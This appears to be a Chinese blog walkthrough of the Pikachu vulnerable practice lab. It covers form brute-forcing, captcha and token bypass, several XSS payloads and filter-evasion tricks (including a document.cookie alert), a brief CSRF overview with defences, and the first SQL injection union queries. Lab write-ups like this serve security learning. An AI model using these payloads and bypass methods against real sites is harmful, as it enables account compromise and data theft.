

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/1145615744/1145615744.github.io.git/img/fluid.png">
  <link rel="icon" href="/1145615744/1145615744.github.io.git/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="暴力破解1.基于表单的暴力破解   用户名字典上传密码字典上传开始爆破，根据长度爆破出账号密码 2.验证码绕过(on server)   用户名 密码 验证码 状态    正确 正确 正确 可以登录   正确 错误 正确 提示账号或密码错误   错误 错误 正确 提示账号或密码错误   正确 正确 错误 提示验证码错误   正确 错误 错误 提示验证码错误   错误 错误 错误 提示验证码错误">
<meta property="og:type" content="article">
<meta property="og:title" content="Pikachu靶场">
<meta property="og:url" content="https://github.com/1145615744/1145615744.github.io.git/2024/01/26/Pikachu%E9%9D%B6%E5%9C%BA/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="暴力破解1.基于表单的暴力破解   用户名字典上传密码字典上传开始爆破，根据长度爆破出账号密码 2.验证码绕过(on server)   用户名 密码 验证码 状态    正确 正确 正确 可以登录   正确 错误 正确 提示账号或密码错误   错误 错误 正确 提示账号或密码错误   正确 正确 错误 提示验证码错误   正确 错误 错误 提示验证码错误   错误 错误 错误 提示验证码错误">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241126163210.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241126163305.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241126163343.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241126163101.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128144356.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128144544.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128144510.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128142813.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128142701.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128142830.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128145535.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128150554.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128150948.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128150958.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128150930.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128153843.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128153753.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128153743.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128155220.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128155710.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128161457.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128161918.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128164835.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128165124.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128165308.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128165346.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128170744.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128170853.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241128171428.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241129134411.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241129134443.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241203154809.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241206205332.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241206205402.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241206210013.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241206210132.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241206210140.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241207094625.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241207094558.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241207094842.png">
<meta property="og:image" content="https://github.com/images/1733536414484.jpg">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241207095542.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208115338.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208121404.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208130206.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208130401.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208132243.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208135939.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208140120.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208140417.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208141932.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208142108.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208142524.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208142716.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208142833.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208143016.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208145648.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208151851.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208191549.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208193020.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208193106.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208193241.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208212129.png">
<meta property="og:image" content="https://github.com/images/Pasted%20image%2020241208212205.png">
<meta property="article:published_time" content="2024-01-26T15:27:55.000Z">
<meta property="article:modified_time" content="2024-12-09T04:31:20.571Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://github.com/images/Pasted%20image%2020241126163210.png">
  
  
  
  <title>Pikachu靶场 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/1145615744/1145615744.github.io.git/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/1145615744/1145615744.github.io.git/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/1145615744/1145615744.github.io.git/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"github.com","root":"/1145615744/1145615744.github.io.git/","version":"1.9.8","typing":{"enable":true,"typeSpeed":100,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/1145615744/1145615744.github.io.git/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/1145615744/1145615744.github.io.git/js/utils.js" ></script>
  <script  src="/1145615744/1145615744.github.io.git/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/1145615744/1145615744.github.io.git/">
      <strong>Net Study</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/1145615744/1145615744.github.io.git/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/1145615744/1145615744.github.io.git/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/1145615744/1145615744.github.io.git/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>联系我</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/1145615744/1145615744.github.io.git/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Pikachu靶场"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-01-26 23:27" pubdate>
          January 26, 2024 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          17 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Pikachu靶场</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a><strong>暴力破解</strong></h2><h3 id="1-基于表单的暴力破解"><a href="#1-基于表单的暴力破解" class="headerlink" title="1.基于表单的暴力破解"></a>1.基于表单的暴力破解</h3><p>   <img src="/../images/Pasted%20image%2020241126163210.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>用户名字典上传<br><img src="/../images/Pasted%20image%2020241126163305.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>密码字典上传<br><img src="/../images/Pasted%20image%2020241126163343.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>开始爆破，根据长度爆破出账号密码<br><img src="/../images/Pasted%20image%2020241126163101.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<h3 id="2-验证码绕过-on-server"><a href="#2-验证码绕过-on-server" class="headerlink" title="2.验证码绕过(on server)"></a>2.验证码绕过(on server)</h3><table>
<thead>
<tr>
<th>用户名</th>
<th>密码</th>
<th>验证码</th>
<th>状态</th>
</tr>
</thead>
<tbody><tr>
<td>正确</td>
<td>正确</td>
<td>正确</td>
<td>可以登录</td>
</tr>
<tr>
<td>正确</td>
<td>错误</td>
<td>正确</td>
<td>提示账号或密码错误</td>
</tr>
<tr>
<td>错误</td>
<td>错误</td>
<td>正确</td>
<td>提示账号或密码错误</td>
</tr>
<tr>
<td>正确</td>
<td>正确</td>
<td>错误</td>
<td>提示验证码错误</td>
</tr>
<tr>
<td>正确</td>
<td>错误</td>
<td>错误</td>
<td>提示验证码错误</td>
</tr>
<tr>
<td>错误</td>
<td>错误</td>
<td>错误</td>
<td>提示验证码错误</td>
</tr>
</tbody></table>
<p>根据以上反馈判断，程序的逻辑是先判断验证码的正确性，验证码会伴随着页面的刷新而刷新，我们通过抓包的方式发送请求，验证我们的猜想。<br>不修改验证码，把用户名密码从错误修改为正确，通过验证不同场景发现，在验证码正确的情况下，程序仍会给出不同的响应，我们猜想正确，可以在验证码为真的情况下进行绕过验证码进行爆破。<br><img src="/../images/Pasted%20image%2020241128144356.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br><img src="/../images/Pasted%20image%2020241128144544.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br><img src="/../images/Pasted%20image%2020241128144510.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>   <img src="/../images/Pasted%20image%2020241128142813.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>      <img src="/../images/Pasted%20image%2020241128142701.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>   <img src="/../images/Pasted%20image%2020241128142830.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<h3 id="3-验证码绕过-on-client"><a href="#3-验证码绕过-on-client" class="headerlink" title="3.验证码绕过(on client)"></a>3.验证码绕过(on client)</h3><h4 id="方法1：-禁用JavaScript后进行爆破"><a href="#方法1：-禁用JavaScript后进行爆破" class="headerlink" title="方法1： 禁用JavaScript后进行爆破"></a>方法1： 禁用JavaScript后进行爆破</h4><p>通过测试，输入错误验证码时会弹出提示<br><img src="/../images/Pasted%20image%2020241128145535.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br><img src="/../images/Pasted%20image%2020241128150554.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>再进行爆破<br><img src="/../images/Pasted%20image%2020241128150948.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br><img src="/../images/Pasted%20image%2020241128150958.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>爆破成功<br><img src="/../images/Pasted%20image%2020241128150930.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<h4 id="方法2：通过持续抓包进行爆破"><a href="#方法2：通过持续抓包进行爆破" class="headerlink" title="方法2：通过持续抓包进行爆破"></a>方法2：通过持续抓包进行爆破</h4><h3 id="4-token防爆破？"><a href="#4-token防爆破？" class="headerlink" title="4.token防爆破？"></a>4.token防爆破？</h3><p>常规抓包进行爆破，无法爆破，有token字段存在</p>
<p> token：通常指的是一个用于验证用户身份和授权访问的令牌。它是一种特殊的字符串或代码，由服务器生成并分配给经过身份验证的用户。用户在成功登录后，服务器会颁发一个token给客户端（例如Web浏览器），客户端将在随后的请求中将该token作为身份验证凭据发送给服务器。<br><img src="/../images/Pasted%20image%2020241128153843.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br><img src="/../images/Pasted%20image%2020241128153753.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br><img src="/../images/Pasted%20image%2020241128153743.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>我们通过修改payload并加入token的payload<br><img src="/../images/Pasted%20image%2020241128155220.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br><img src="/../images/Pasted%20image%2020241128155710.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br><img src="/../images/Pasted%20image%2020241128161457.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>根据返回情况爆破成功<br><img src="/../images/Pasted%20image%2020241128161918.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<h2 id="XSS（跨站脚本）攻击"><a href="#XSS（跨站脚本）攻击" class="headerlink" title="XSS（跨站脚本）攻击"></a>XSS（跨站脚本）攻击</h2><p><strong>1.scirpt 标签</strong></p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="language-javascript"><span class="hljs-title function_">alert</span>(<span class="hljs-string">&quot;xss&quot;</span>);</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br></code></pre></td></tr></table></figure>
<p><strong>2.img 标签</strong></p>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs abnf">&lt;img src<span class="hljs-operator">=</span><span class="hljs-number">1</span> onerror<span class="hljs-operator">=</span>alert(<span class="hljs-string">&quot;xss&quot;</span>)<span class="hljs-comment">;&gt;</span><br></code></pre></td></tr></table></figure>
<p><strong>3.input 标签</strong><br><code>&lt;input &gt;</code> 标签规定了用户可以在其中输入数据的输入字段。</p>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs abnf">onfocus 事件在对象获得焦点时发生：<br>&lt;input onfocus<span class="hljs-operator">=</span>alert(<span class="hljs-number">1</span>)<span class="hljs-comment">;&gt;</span><br></code></pre></td></tr></table></figure>

<h3 id="1-反射型xss-get"><a href="#1-反射型xss-get" class="headerlink" title="1.反射型xss(get)"></a>1.反射型xss(get)</h3><p><img src="/../images/Pasted%20image%2020241128164835.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>输入脚本代码，发现长度被截断：<br><img src="/../images/Pasted%20image%2020241128165124.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>检查网页源代码，删除长度限制字段代码<br><img src="/../images/Pasted%20image%2020241128165308.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>删除后发现注入成功：<br><img src="/../images/Pasted%20image%2020241128165346.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<h3 id="2-反射性xss-post"><a href="#2-反射性xss-post" class="headerlink" title="2.反射性xss(post)"></a>2.反射性xss(post)</h3><p> 需要填写表单信息，点击提示，发现给出用户名和密码，目的想让我们拿到登陆后的cookie<br><img src="/../images/Pasted%20image%2020241128170744.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>登陆后，输入脚本，可以看到存在xss漏洞，但这关让我们拿到cookie。<br><img src="/../images/Pasted%20image%2020241128170853.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>我们需要利用xss漏洞输出cookie，以下是脚本代码：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="language-javascript"><span class="hljs-title function_">alert</span>(<span class="hljs-variable language_">document</span>.<span class="hljs-property">cookie</span>)</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="/../images/Pasted%20image%2020241128171428.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<h3 id="3-DOM型XSS"><a href="#3-DOM型XSS" class="headerlink" title="3.DOM型XSS"></a>3.DOM型XSS</h3><p>利用onclick方法进行</p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs 1c">&#x27; onclick=alert(&#x27;xss&#x27;)&gt;<br></code></pre></td></tr></table></figure>

<p><img src="/../images/Pasted%20image%2020241129134411.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br><img src="/../images/Pasted%20image%2020241129134443.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<h3 id="4-XSS绕过方式"><a href="#4-XSS绕过方式" class="headerlink" title="4.XSS绕过方式"></a><strong>4.XSS绕过方式</strong></h3><p><img src="/../images/Pasted%20image%2020241203154809.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>1.大小写绕过</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">sCRiPt</span>&gt;</span>alert(1);<span class="hljs-tag">&lt;/<span class="hljs-name">sCrIpT</span>&gt;</span><br></code></pre></td></tr></table></figure>
<p>2.注释符号绕过</p>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs abnf">/**/，注释符号绕过；/符号绕过；<br>&lt;img/src<span class="hljs-operator">=</span><span class="hljs-string">&quot;x&quot;</span>/onerror<span class="hljs-operator">=</span>alert(<span class="hljs-number">1</span>)<span class="hljs-comment">;&gt;</span><br><br>也可以：<br><br>&lt;img/src<span class="hljs-operator">=</span><span class="hljs-string">&quot;x&quot;</span>onerror<span class="hljs-operator">=</span>alert(<span class="hljs-number">1</span>)<span class="hljs-comment">;&gt;</span><br><br></code></pre></td></tr></table></figure>
<p>3.利用其他标签绕过</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">&lt;img <span class="hljs-attribute">src</span>=1 <span class="hljs-attribute">onerror</span>=alert(1)&gt;<br></code></pre></td></tr></table></figure>

<h3 id="5-xss之htmlspecialchars"><a href="#5-xss之htmlspecialchars" class="headerlink" title="5.xss之htmlspecialchars"></a>5.xss之htmlspecialchars</h3><h4 id="htmlspecialchars-函数的定义和用法"><a href="#htmlspecialchars-函数的定义和用法" class="headerlink" title="htmlspecialchars() 函数的定义和用法"></a>htmlspecialchars() 函数的定义和用法</h4><p>htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。预定义的字符包括如下：</p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs 1c"><span class="hljs-meta">&amp; （和号）成为 &amp;</span><br><span class="hljs-string">&quot; （双引号）成为 &quot;</span><br>&#x27; （单引号）成为 &#x27;<br>&lt; （小于）成为 &lt;<br></code></pre></td></tr></table></figure>

<p>简单来说就是把单引号，双引号，尖括号等字符串过滤了，但是这个函数默认是不过滤单引号的，只有将quotestyle选项为ENT_QUOTES才会过滤单引号。<br>输入框的值会成为a标签的href属性，那么xss语句为:</p>
<figure class="highlight matlab"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs matlab"><span class="hljs-number">1111</span>&#x27; onclick=alert(<span class="hljs-string">&#x27;aaaa&#x27;</span>)&gt;<br></code></pre></td></tr></table></figure>
<p><img src="/../images/Pasted%20image%2020241206205332.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><img src="/../images/Pasted%20image%2020241206205402.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>发现报错，没有弹窗<br><img src="/../images/Pasted%20image%2020241206210013.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>将语句修改为</p>
<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gcode"><span class="hljs-number">1111</span><span class="hljs-string">&#x27; onclick=&#x27;</span>alert<span class="hljs-comment">(aaaa)</span><span class="hljs-string">&#x27;&gt;</span><br></code></pre></td></tr></table></figure>
<p><img src="/../images/Pasted%20image%2020241206210132.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>成功弹窗<br><img src="/../images/Pasted%20image%2020241206210140.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>方法二：<br>利用JavaScript协议来执行js语句。</p>
<figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs isbl"><span class="hljs-variable">javascript</span>:<span class="hljs-function"><span class="hljs-title">alert</span>(<span class="hljs-string">&#x27;java&#x27;</span>)</span><br></code></pre></td></tr></table></figure>








<h3 id="xss之href输出"><a href="#xss之href输出" class="headerlink" title="xss之href输出"></a>xss之href输出</h3><p><img src="/../images/Pasted%20image%2020241207094625.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>检查源代码发现字符被转义<br><img src="/../images/Pasted%20image%2020241207094558.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>我们仍然可以利用JavaScript协议来执行js语句的方式</p>
<figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs isbl"><span class="hljs-variable">javascript</span>:<span class="hljs-function"><span class="hljs-title">alert</span>(<span class="hljs-string">&#x27;java&#x27;</span>)</span><br></code></pre></td></tr></table></figure>
<p>成功弹出：<br><img src="/../images/Pasted%20image%2020241207094842.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<h3 id="XSS之JS"><a href="#XSS之JS" class="headerlink" title="XSS之JS"></a>XSS之JS</h3><p>检查源代码发现，可以利用</script>进行闭合，然后输出我们想要的</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="language-javascript"><span class="hljs-title function_">alert</span>(<span class="hljs-string">&#x27;xx-js&#x27;</span>)</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="/../images/1733536414484.jpg" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br><img src="/../images/Pasted%20image%2020241207095542.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<h2 id="CSRF-跨站请求伪造"><a href="#CSRF-跨站请求伪造" class="headerlink" title="CSRF(跨站请求伪造)"></a>CSRF(跨站请求伪造)</h2><p>CSRF(跨站请求伪造)概述</p>
<p>Cross-site request forgery 简称为“CSRF”，在CSRF的攻击场景中攻击者会伪造一个请求（这个请求一般是一个链接），然后欺骗目标用户进行点击，用户一旦点击了这个请求，整个攻击就完成了。所以CSRF攻击也成为”one click”攻击。 </p>
<p>防范CSRF攻击的方式：</p>
<ol>
<li>–对敏感信息的操作增加安全的token；  </li>
<li>–对敏感信息的操作增加安全的验证码；  </li>
<li>–对敏感信息的操作实施安全的逻辑流程，比如修改密码时，需要先校验旧密码等。</li>
</ol>
<h2 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h2><h3 id="数字型注入（post注入）"><a href="#数字型注入（post注入）" class="headerlink" title="数字型注入（post注入）"></a><strong>数字型注入（post注入）</strong></h3><figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crmsh"><span class="hljs-attr">id=</span>-<span class="hljs-number">4</span> <span class="hljs-keyword">order</span> <span class="hljs-title">by</span> <span class="hljs-number">3</span><br></code></pre></td></tr></table></figure>

<p><img src="/../images/Pasted%20image%2020241208115338.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">id=<span class="hljs-number">-4</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-keyword">database</span>(),version()<br></code></pre></td></tr></table></figure>
